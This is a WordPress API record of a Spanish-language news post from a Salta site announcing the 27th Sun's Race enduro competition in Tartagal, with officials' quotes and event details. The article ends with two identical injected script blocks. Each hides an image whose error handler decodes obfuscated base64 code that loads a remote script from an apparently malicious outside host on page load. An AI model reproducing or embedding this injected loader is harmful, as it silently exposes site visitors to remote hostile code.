{"id":4163,"date":"2024-07-02T11:20:12","date_gmt":"2024-07-02T14:20:12","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4163"},"modified":"2025-08-13T23:53:29","modified_gmt":"2025-08-14T02:53:29","slug":"del-5-al-7-de-julio-se-realizara-la-27o-edicion-de-la-carrera-de-enduro-suns-race","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4163","title":{"rendered":"Del 5 al 7 de julio se realizar\u00e1 la 27\u00ba edici\u00f3n de la Carrera de Enduro Sun\u00b4s Race"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-2652125b39558728ea7cdee31ec3f018\" style=\"background-color:#ab075b\"><strong><em>La competencia de enduro, que cuenta ya con m\u00e1s de 200 inscriptos, se vivir\u00e1 una vez m\u00e1s en la localidad de Tartagal, con un recorrido de 32 kil\u00f3metros, caracterizados por trechos de suelo arenoso, piedras y lechos de r\u00edos.<\/em><\/strong><\/h5>\n\n\n\n<p>La 27\u00ba edici\u00f3n de Sun`s Race, considerada la m\u00e1s importante del norte argentino, se vivir\u00e1 los d\u00edas 5, 6 y 7 de julio en la localidad de Tartagal. Los detalles se presentaron en un acto encabezado por el ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a;&nbsp;<\/strong>el coordinador General del Evento,&nbsp;<strong>Jos\u00e9 Butcovich<\/strong>; el director de Deportes de Tartagal,&nbsp;<strong>Aldo Tejerina<\/strong>; y competidores de la carrera de enduro.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12784-presentacion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12784-presentacion.jpg\" alt=\"Presentaci\u00f3n.\"\/><\/a><\/figure>\n\n\n\n<p>En la oportunidad, Pe\u00f1a manifest\u00f3 \u201ceste tipo de eventos es clave para la Provincia, vamos a recibir en Salta m\u00e1s de 200 competidores de todo el pa\u00eds que vendr\u00e1n junto a sus familias y amigos a disfrutar de esta gran competencia y de nuestra Salta\u201d, al tiempo que destac\u00f3 \u201ca trav\u00e9s de estos eventos deportivos el Norte tiene la posibilidad de continuar potenciando el turismo\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-embed alignright is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Del 5 al 7 de julio se realizar\u00e1 la 27\u00ba edici\u00f3n de la Carrera de Enduro Sun\u00b4s Race\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/Eq0nZK0_Rp0?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Por su parte, el Coordinador del Evento dijo \u201c gracias al apoyo del Gobierno de la Provincia y de la Municipalidad de Tartagal, logramos para este a\u00f1o, a trav\u00e9s de una gran inversi\u00f3n, mejorar la pista con riego de aspersi\u00f3n que har\u00e1 que haya cero polvo en suspensi\u00f3n; adem\u00e1s se instalaron ba\u00f1os y habr\u00e1 un patio de comida&nbsp; para que tanto los corredores, como todos los salte\u00f1os y visitantes puedan disfrutar de estos tres d\u00edas de competencia\u201d.<\/p>\n\n\n\n<p>\u201cLa Carrera de Todos\u201d, como se lo conoce a este evento, se realizar\u00e1 con un recorrido de 32 kil\u00f3metros de longitud, caracterizado por trechos de suelo arenoso, piedras y lechos de r\u00edos.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n e inscripciones, ingresar a&nbsp;<a href=\"https:\/\/www.sunsrace.com.ar\/\">https:\/\/www.sunsrace.com.ar\/.<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12785-presentacion.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12785-presentacion.jpg\" alt=\"Presentaci\u00f3n\"\/><\/a><\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/del-5-al-7-de-julio-se-realizara-la-27-edicion-de-la-carrera-de-enduro-suns-race-96483\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La competencia de enduro, que cuenta ya con m\u00e1s de 200 inscriptos, se vivir\u00e1 una vez m\u00e1s en la localidad de Tartagal, con un recorrido de 32 kil\u00f3metros, caracterizados por trechos de suelo arenoso, piedras y lechos de r\u00edos. La 27\u00ba edici\u00f3n de Sun`s Race, considerada la m\u00e1s importante del norte argentino, se vivir\u00e1 los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4164,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-4163","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4163"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4163"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4163\/revisions"}],"predecessor-version":[{"id":6751,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4163\/revisions\/6751"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4164"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}